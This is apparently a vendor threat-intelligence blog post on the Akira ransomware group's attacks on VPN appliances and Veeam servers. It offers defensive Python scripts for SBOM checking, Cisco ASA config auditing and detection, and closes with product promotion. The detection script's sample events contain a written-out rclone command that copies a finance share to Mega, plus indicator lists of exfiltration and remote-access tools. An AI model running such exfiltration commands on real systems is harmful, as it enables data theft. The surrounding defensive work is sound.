Akira emerged in March 2023 and moved quickly from opportunistic ransomware to a systematic exploiter of edge network appliances. The FBI, CISA, Europol EC3, and the Netherlands NCSC-NL jointly published advisory AA24-109A on 18 April 2024, documenting more than 250 victim organizations and approximately USD 42 million in known ransom proceeds as of 1 January 2024. Subsequent advisories and vendor research have filled in the tradecraft: Cisco ASA/FTD exploitation via CVE-2023-20269; SonicWall SSLVPN targeting via CVE-2024-40766, covered by SonicWall's August 2024 advisory and confirmed as actively exploited in its September update; and a persistent focus on Veeam Backup & Replication (CVE-2024-40711) to break recovery.
This is the playbook of an actor that understands that network appliances are software — and software that its owners rarely patch at enterprise cadence. For security engineers, Akira is the clearest case study for why edge firmware and VPN software deserve the same supply chain scrutiny as application dependencies.
How did Akira pivot from opportunistic intrusion to VPN-centric tradecraft?
Akira's 2023 campaigns targeted Cisco ASA and FTD devices whose remote access VPN had no MFA. Arctic Wolf's August 2023 research and Sophos X-Ops' September 2023 publication both traced intrusions to the weakness Cisco later assigned CVE-2023-20269: improper separation of authentication, authorization and accounting (AAA) between the remote access VPN feature and the HTTPS management and site-to-site VPN features. By specifying a default connection profile, an unauthenticated attacker could brute-force usernames and passwords against the device without triggering lockout, and a valid local user who was never authorized for VPN could, in some configurations, establish a clientless SSL VPN session. It was not a remote code execution bug; it was a default that turned the appliance into a credential oracle.
AA24-109A formalized what researchers had been reporting: Akira affiliates prefer edge devices as initial access, establish persistence through legitimate admin tooling, and escalate through AD lateral movement before deploying the encryptor. The VPN appliance is the ideal initial access vector because it is internet-exposed, it concentrates credentials, and organizations treat it as infrastructure rather than software that needs continuous patching.
By 2024, SonicWall SSLVPN joined the target list. SonicWall's 22 August 2024 Security Advisory SNWLID-2024-0015 for CVE-2024-40766 (improper access control in SonicOS management access, which SonicWall later stated also affects the SSLVPN feature) was being exploited within weeks of publication: SonicWall updated the advisory in September to confirm active exploitation, and Arctic Wolf and Rapid7 both documented Akira-affiliated intrusions through it. Fortinet SSL-VPN advisories in 2024 saw similar pickup.
What tooling and malware does Akira use after initial access?
Post-compromise, Akira runs a standardized kit. Living-off-the-land tools dominate: PowerShell for discovery, SoftPerfect netscan and Advanced IP Scanner for network enumeration, AnyDesk and RustDesk for remote access, and Rclone (with FileZilla and WinSCP also observed) for exfiltration to Mega.nz or attacker-controlled infrastructure. Credential access relies on Mimikatz and LaZagne and on minidumps of LSASS process memory, all of which AA24-109A documents.
The encryptor has several builds. The original Windows encryptor was written in C++ and appended a .akira extension; a Linux/ESXi build followed in mid-2023; and beginning in August 2023 some intrusions deployed Megazord, a Rust-based encryptor that uses the .powerranges extension, alongside a Rust-based Linux variant tracked as Akira_v2, with affiliates using the builds interchangeably per AA24-109A. The ESXi builds target VMware infrastructure directly, which matches Akira's victim profile: mid-market organizations with VMware-anchored datacenters.
Veeam Backup & Replication is a consistent secondary target. Veeam's 4 September 2024 advisory for CVE-2024-40711 (a deserialization flaw allowing unauthenticated remote code execution, CVSS 9.8) was followed in October 2024 by Sophos X-Ops incident reports tying Akira and Fog affiliates to exploitation of Veeam servers. In those cases the actors reached the Veeam host through compromised VPN credentials with no MFA, then used the exploit to create local accounts and add them to the administrators group ahead of encryption. The pattern of taking the backup infrastructure first, so that recovery fails, is now standard.
Which advisories and indictments anchor the attribution and the IOCs?
AA24-109A is the primary public reference, and CISA has updated it since publication with additional IOCs and TTPs. Later joint #StopRansomware advisories place Akira in the broader ransomware threat landscape, and Europol's IOCTA 2024 report covered Akira's position among the ransomware variants targeting EU victims.
On the indictment side, no public US indictment has attributed Akira to named individuals. Blockchain analysis has done the attribution work instead: Arctic Wolf's 2023 research traced Akira ransom payments to wallets previously associated with Conti affiliates, and the Chainalysis 2024 Crypto Crime Report and TRM Labs' 2024 year-end summary track Akira's share of ransomware payments. Together they support the working model among ransomware-ecosystem researchers that Akira's operators include veterans of earlier groups.
Why are VPN appliances a supply chain problem, not just an operations problem?
VPN appliances ship as software running on vendor-hardened hardware. The firmware includes the operating system, the VPN daemon, web management, authentication subsystems, and often third-party components whose versions are invisible to the operator. CVE-2023-20269 on Cisco, CVE-2024-40766 on SonicWall, and the long tail of Fortinet SSL-VPN CVEs (CVE-2022-42475, CVE-2023-27997, CVE-2024-21762) are all failures at the software supply chain level — in the vendor's code, in the vendor's third-party libraries, or in the vendor's default configurations.
Operators cannot patch what they cannot inventory, and vendors have historically been opaque about the components inside their firmware. CISA's Binding Operational Directive 23-01 (October 2022, asset visibility and vulnerability detection) and BOD 23-02 (June 2023, internet-exposed management interfaces) began to close the gap for federal agencies, and the joint edge-device security guidance CISA and its international partners published in early 2025 extends the same expectations to everyone else, but most organizations still do not have SBOMs for their VPN firmware. Akira's 2024 campaign is the direct cost of that opacity.
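What the missing inventory step looks like when a vendor does supply one: the script below takes a CycloneDX SBOM for a firmware image and reports which components fall inside known-vulnerable version ranges. This is an added example written for this page, not vendor tooling or code from any of the advisories cited. The SBOM document, the component names and versions, and the vulnerability entries (VULN-0001 to VULN-0003) are constructed placeholders, not real advisories; only the CycloneDX field names (bomFormat, components, name, version, purl) are real.

```python
"""Check a firmware SBOM (CycloneDX JSON) against known-vulnerable component
version ranges: the inventory-to-exposure step operators cannot perform when
the vendor ships no SBOM.

Added example, not vendor tooling. SBOM contents and the VULN-* entries are
constructed placeholders; only the CycloneDX field names are real.
"""
import json
import re

# Constructed SBOM for a fictitious SSL-VPN firmware image.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "metadata": {"component": {"name": "sslvpn-firmware", "version": "7.2.1"}},
    "components": [
        {"type": "library", "name": "openssl", "version": "1.1.1k",
         "purl": "pkg:generic/openssl@1.1.1k"},
        {"type": "library", "name": "libxml2", "version": "2.9.14",
         "purl": "pkg:generic/libxml2@2.9.14"},
        {"type": "application", "name": "sslvpnd", "version": "7.2.1",
         "purl": "pkg:generic/sslvpnd@7.2.1"},
    ],
})

# Hypothetical affected ranges: "introduced" is inclusive, "fixed" is exclusive.
KNOWN_VULNS = [
    {"id": "VULN-0001", "component": "openssl", "introduced": "1.1.1", "fixed": "1.1.1w"},
    {"id": "VULN-0002", "component": "sslvpnd", "introduced": "7.0.0", "fixed": "7.2.3"},
    {"id": "VULN-0003", "component": "libxml2", "introduced": "2.9.0", "fixed": "2.9.12"},
]


def version_key(version):
    """Sortable key: numeric runs compare as integers, letter runs as strings,
    so 1.1.1k < 1.1.1w and 2.9.9 < 2.9.14. Deliberately simple: semver
    pre-release tags (1.0.0-rc1 < 1.0.0) are NOT handled."""
    parts = re.findall(r"\d+|[A-Za-z]+", version)
    return tuple((0, int(p)) if p.isdigit() else (1, p.lower()) for p in parts)


def in_range(version, introduced, fixed):
    """True if introduced <= version < fixed under version_key ordering."""
    key = version_key(version)
    return version_key(introduced) <= key < version_key(fixed)


def component_name(comp):
    """Prefer the name inside the purl (pkg:type/[namespace/]name@version);
    fall back to the component's 'name' field."""
    match = re.match(r"pkg:[^/]+/(?:[^/@]+/)*([^/@]+)@", comp.get("purl", ""))
    return (match.group(1) if match else comp.get("name", "")).lower()


def exposures(sbom_json, vulns=KNOWN_VULNS):
    """Return one record per (component, vulnerability) the SBOM is exposed to."""
    sbom = json.loads(sbom_json)
    if sbom.get("bomFormat") != "CycloneDX":
        raise ValueError("expected a CycloneDX document")
    hits = []
    for comp in sbom.get("components", []):
        name, version = component_name(comp), comp.get("version", "")
        for vuln in vulns:
            if vuln["component"] == name and in_range(version, vuln["introduced"], vuln["fixed"]):
                hits.append({"id": vuln["id"], "component": name,
                             "version": version, "fixed_in": vuln["fixed"]})
    return hits


if __name__ == "__main__":
    for hit in exposures(SAMPLE_SBOM):
        print(f'{hit["id"]}: {hit["component"]} {hit["version"]} (fixed in {hit["fixed_in"]})')
```

Two of the three components are flagged: the libxml2 build is past its fix version and correctly drops out. The point is the shape of the check, not the placeholder data: the same loop against CISA KEV or a vendor PSIRT feed is what "inventory edge firmware components" means in practice, and it is impossible without the component list.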
The Cyber Safety Review Board's April 2024 report on the 2023 Storm-0558 intrusion into Microsoft Exchange Online, while not about VPNs, concluded that the intrusion was preventable and faulted the vendor's security culture and its slow, incomplete transparency with customers. The lesson transfers directly to the VPN appliance problem: operators of edge devices know only what the vendor chooses to disclose about the software inside the box.
What does the initial access economy look like in 2025-2026?
Initial access brokers (IABs) who specialize in edge-device footholds sell access into the Akira ecosystem. KELA's 2024 threat intelligence reporting and Group-IB's 2024 ransomware market summaries document the market: VPN and firewall footholds, SonicWall SSLVPN and Cisco ASA among them, are a standard product line, priced by victim sector and size and typically in the low thousands of USD. The economy is mature and priced.
Affiliates then purchase access, run the Akira playbook, and negotiate the ransom. The ransomware-as-a-service model means the operators who wrote the encryptor may not be the operators who breach any given victim — a key point for attribution and for understanding why IOCs shift quickly while the underlying tradecraft is stable.
What controls break the chain specifically for VPN-centric ransomware?
Three controls, applied together, would blunt most Akira intrusions. First, enforced MFA on all VPN authentication, including legacy clients and clientless portals: Cisco's 2023 advisory and accompanying guidance pointed to missing MFA and the absence of lockout on the remote access VPN as the conditions that made CVE-2023-20269 useful, and recommended MFA plus denying VPN access through the default group policy and the default tunnel groups. Second, edge-device firmware management with the same SLAs as endpoint patching: 72 hours for KEV-listed vulnerabilities, not 90 days. Third, backup isolation at the network level: Veeam hosts on a separate management plane, reachable only through a hardened admin path, with no route from the user VLAN.
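The first control can be checked against configuration rather than asserted. The script below audits a Cisco ASA running-config excerpt for the conditions that made CVE-2023-20269 exploitable: remote access VPN still reachable through the default group policy and default tunnel groups, LOCAL authentication with no lockout, and no second factor on remote-access tunnel groups. It is an added example written for this page, not Cisco's tooling and not code from the advisory. The checks follow the mitigations Cisco published for CVE-2023-20269 (vpn-simultaneous-logins 0 on DfltGrpPolicy, no usable default tunnel groups, local lockout, MFA); both config excerpts are constructed, and the server names, group names and addresses in them are placeholders.

```python
"""Audit a Cisco ASA running-config excerpt for the weak conditions behind
CVE-2023-20269 and print the "before" (weak) and "after" (hardened) results.

Added example, not Cisco tooling. Both configs are constructed; names such as
LDAP_SRV, MFA_RADIUS, Employees and GP_Employees are placeholders.
"""
import re

# Constructed "before": default tunnel group accepts LOCAL logins, default
# group policy permits VPN, no lockout, single-factor LDAP for employees.
WEAK_CONFIG = """\
aaa-server LDAP_SRV protocol ldap
aaa-server LDAP_SRV (inside) host 10.0.0.5
group-policy DfltGrpPolicy attributes
 vpn-simultaneous-logins 3
 vpn-tunnel-protocol ssl-client
tunnel-group DefaultWEBVPNGroup general-attributes
 authentication-server-group LOCAL
tunnel-group Employees type remote-access
tunnel-group Employees general-attributes
 authentication-server-group LDAP_SRV
"""

# Constructed "after": lockout on, default policy denies VPN, a named policy
# per tunnel group, RADIUS-based second factor on the employee tunnel group.
HARDENED_CONFIG = """\
aaa local authentication attempts max-fail 5
aaa-server LDAP_SRV protocol ldap
aaa-server LDAP_SRV (inside) host 10.0.0.5
aaa-server MFA_RADIUS protocol radius
aaa-server MFA_RADIUS (inside) host 10.0.0.6
group-policy DfltGrpPolicy attributes
 vpn-simultaneous-logins 0
group-policy GP_Employees internal
group-policy GP_Employees attributes
 vpn-simultaneous-logins 3
 vpn-tunnel-protocol ssl-client
tunnel-group Employees type remote-access
tunnel-group Employees general-attributes
 authentication-server-group LDAP_SRV
 secondary-authentication-server-group MFA_RADIUS
 default-group-policy GP_Employees
"""


def parse_blocks(config):
    """Group ASA config text into (top-level line, [indented child lines])."""
    blocks = []
    for raw in config.splitlines():
        if not raw.strip():
            continue
        if raw[0] in " \t":
            if blocks:
                blocks[-1][1].append(raw.strip())
        else:
            blocks.append((raw.strip(), []))
    return blocks


def audit_asa_config(config):
    """Return a list of findings; empty means none of the checked weak
    conditions is present."""
    findings = []
    blocks = parse_blocks(config)
    headers = [h for h, _ in blocks]

    # 1. Brute force against LOCAL accounts is only expensive with a lockout.
    if not any(h.startswith("aaa local authentication attempts max-fail") for h in headers):
        findings.append("no lockout: 'aaa local authentication attempts max-fail' not set")

    # 2. DfltGrpPolicy must deny logins, otherwise the built-in default tunnel
    #    groups (DefaultWEBVPNGroup, DefaultADMINGroup) stay usable for VPN.
    logins = None
    for header, kids in blocks:
        if header == "group-policy DfltGrpPolicy attributes":
            for kid in kids:
                match = re.fullmatch(r"vpn-simultaneous-logins (\d+)", kid)
                if match:
                    logins = int(match.group(1))
    if logins != 0:
        findings.append("DfltGrpPolicy permits VPN logins: set 'vpn-simultaneous-logins 0' "
                        "and give every tunnel group its own group policy")

    # 3. A default tunnel group with an authentication server is an open door.
    for header, kids in blocks:
        if header.startswith("tunnel-group Default") and header.endswith("general-attributes"):
            if any(k.startswith("authentication-server-group") for k in kids):
                findings.append(f"{header.split()[1]} accepts logins; default tunnel groups "
                                "should not be configured for remote access")

    # 4. Remote-access tunnel groups need a second factor. Heuristic only: MFA
    #    enforced inside the primary RADIUS/LDAP server is invisible here.
    ra_groups = {h.split()[1] for h in headers
                 if h.startswith("tunnel-group ") and h.endswith(" type remote-access")}
    for header, kids in blocks:
        parts = header.split()
        if (len(parts) == 3 and parts[0] == "tunnel-group"
                and parts[2] == "general-attributes" and parts[1] in ra_groups):
            if not any(k.startswith("secondary-authentication-server-group") for k in kids):
                findings.append(f"tunnel-group {parts[1]}: single-factor authentication "
                                "(no secondary-authentication-server-group)")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_asa_config(cfg)
        print(f"{label}: {len(result)} finding(s)")
        for finding in result:
            print("  -", finding)
```

Run against a real `show running-config`, the fourth check is the one to treat with care: a primary RADIUS server that itself enforces MFA will look single-factor to this parser, so confirm that path separately rather than silencing the finding.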
Detection controls matter too. Egress to Mega.nz, AnyDesk and RustDesk installs on hosts with no business running them, and Rclone-style bulk transfers are documented in AA24-109A and in Microsoft's threat intelligence on the cluster it tracks as Storm-1567. NDR and EDR tuned for those patterns catch the affiliates who fail to vary their tooling.
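Tuned for those patterns means more than matching a process name. The script below, an added example written for this page and not taken from the advisory or from any vendor's detection content, scores each host on the distinct stages of the Akira tool chain it exhibits (scanner, remote access tool, Rclone or Mega traffic) so that a helpdesk machine running AnyDesk alone does not alert while a file server showing all three stages does. The event format and the sample events are constructed. The process names are the tools AA24-109A lists and mega.nz is named above; the anydesk.com and rustdesk.com relay domains, the stage weights, and the alert threshold are assumptions to tune against your own telemetry.

```python
"""Score hosts for the post-access Akira tool chain AA24-109A describes:
network scanner, then a remote access tool, then Rclone pushing data to Mega.

Added example, not advisory or vendor content. Events are constructed;
RMM relay domains, weights and threshold are assumptions.
"""
import json
from collections import defaultdict

# Indicators by stage, matched against lower-cased process basename or hostname.
SCANNERS = {"netscan.exe", "advanced_ip_scanner.exe"}
REMOTE_TOOLS = {"anydesk.exe", "rustdesk.exe"}
EXFIL_TOOLS = {"rclone.exe"}
EXFIL_DOMAINS = ("mega.nz", "mega.co.nz")        # Mega API/storage endpoints
RMM_DOMAINS = ("anydesk.com", "rustdesk.com")    # assumed relay domains

STAGE_WEIGHTS = {"discovery": 1, "remote_access": 2, "exfil": 3}
ALERT_THRESHOLD = 4   # remote_access + exfil, or all three stages, on one host

# Constructed telemetry: process creation, DNS and proxy events from three hosts.
SAMPLE_EVENTS = [
    {"ts": "01:12:04", "host": "fs01", "type": "process",
     "image": "C:\\Users\\svc_backup\\Downloads\\netscan.exe",
     "cmdline": "netscan.exe /range:10.20.0.0/16"},
    {"ts": "01:40:51", "host": "fs01", "type": "process",
     "image": "C:\\ProgramData\\AnyDesk\\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"},
    {"ts": "01:41:03", "host": "fs01", "type": "dns", "query": "relay-3.net.anydesk.com"},
    {"ts": "02:05:17", "host": "fs01", "type": "process",
     "image": "C:\\Windows\\Temp\\rclone.exe",
     "cmdline": "rclone.exe copy \\\\fs01\\finance mega:dump --transfers 16"},
    {"ts": "02:05:20", "host": "fs01", "type": "proxy",
     "dest_host": "g.api.mega.co.nz", "bytes_out": 91234567},
    {"ts": "08:00:00", "host": "ws-helpdesk7", "type": "process",
     "image": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"ts": "09:15:00", "host": "ws-dev2", "type": "proxy",
     "dest_host": "github.com", "bytes_out": 2048},
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def host_matches(hostname, domains):
    """True if hostname is one of domains or a subdomain of one."""
    return any(hostname == d or hostname.endswith("." + d) for d in domains)


def classify(event):
    """Map one event to a stage name, or None if it matches no indicator."""
    kind = event.get("type")
    if kind == "process":
        name = basename(event.get("image", ""))
        if name in SCANNERS:
            return "discovery"
        if name in REMOTE_TOOLS:
            return "remote_access"
        if name in EXFIL_TOOLS:
            return "exfil"
    elif kind in ("dns", "proxy"):
        hostname = (event.get("query") or event.get("dest_host") or "").lower()
        if host_matches(hostname, EXFIL_DOMAINS):
            return "exfil"
        if host_matches(hostname, RMM_DOMAINS):
            return "remote_access"
    return None


def score_hosts(events, rmm_allowlist=frozenset()):
    """Per host: distinct stages seen, weighted score, and evidence lines.
    rmm_allowlist: hosts where AnyDesk/RustDesk is sanctioned (e.g. helpdesk)."""
    per_host = defaultdict(lambda: {"score": 0, "stages": set(), "evidence": []})
    for event in events:
        stage = classify(event)
        if stage is None or (stage == "remote_access" and event["host"] in rmm_allowlist):
            continue
        record = per_host[event["host"]]
        if stage not in record["stages"]:          # weight each stage once per host
            record["stages"].add(stage)
            record["score"] += STAGE_WEIGHTS[stage]
        detail = event.get("cmdline") or event.get("query") or event.get("dest_host")
        record["evidence"].append(f'{event["ts"]} {stage}: {detail}')
    return dict(per_host)


def alerts(events, rmm_allowlist=frozenset()):
    """Hosts whose score reaches ALERT_THRESHOLD, sorted."""
    return sorted(h for h, r in score_hosts(events, rmm_allowlist).items()
                  if r["score"] >= ALERT_THRESHOLD)


if __name__ == "__main__":
    allow = {"ws-helpdesk7"}
    print(json.dumps(score_hosts(SAMPLE_EVENTS, allow), indent=2, default=sorted))
    print("alerts:", alerts(SAMPLE_EVENTS, allow))
```

Only fs01 alerts: it accumulates discovery, remote access and exfiltration evidence within an hour, while the helpdesk workstation's sanctioned AnyDesk scores below the threshold even before it is allowlisted. Weighting by distinct stage rather than by event count is what keeps a noisy scanner from drowning out a single, decisive Rclone run.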
How does this tie to the broader edge device supply chain risk?
Akira is one of several actors, alongside Black Basta, RansomHub, Qilin and the Scattered Spider cluster, that have industrialized edge exploitation. CISA's 2024 and 2025 KEV additions are heavily weighted toward edge device CVEs. The pattern will not break until operators can inventory edge firmware components with the same granularity as application dependencies.
CISA's Secure by Design work in 2024-2025 named edge devices as a specific focus. The May 2024 Secure by Design pledge does not require firmware SBOMs, but the federal acquisition track, through FedRAMP Rev. 5 and CISA's Secure Software Development Attestation Form, is moving toward SBOM-level evidence for network equipment sold to federal buyers.
How Safeguard.sh Helps
Safeguard.sh treats edge appliances as first-class software assets. Eagle detection inventories VPN firmware versions, exposed management interfaces, and configuration drift from vendor hardening guides, then correlates against CISA KEV (including CVE-2023-20269, CVE-2024-40766, and the Fortinet SSL-VPN CVE set) so operators see actual exposure, not just patch-status paperwork. AA24-109A IOCs and Akira tooling signatures are integrated into detection policy.
The zero-day pipeline monitors vendor PSIRT feeds, exploit broker telemetry, and research disclosures for edge-device CVEs, opening tickets before a CVE graduates to KEV. SBOM lineage, where vendors provide it, follows firmware components through releases so a single upstream fix can be propagated to every affected deployment.
For TPRM, Safeguard.sh tracks VPN vendor patch cadence, disclosure practice, and historical CVE severity — the dimensions that predict the next Akira-class exposure. Lino compliance mapping aligns CISA BOD 23-01, Secure by Design pledge items, and FedRAMP Rev. 5 SR controls with edge-device engineering evidence. Griffin AI remediation drafts the specific config change, firmware upgrade, or vendor engagement needed when an appliance drifts into exposure, with the audit trail regulators and cyber insurers both now demand.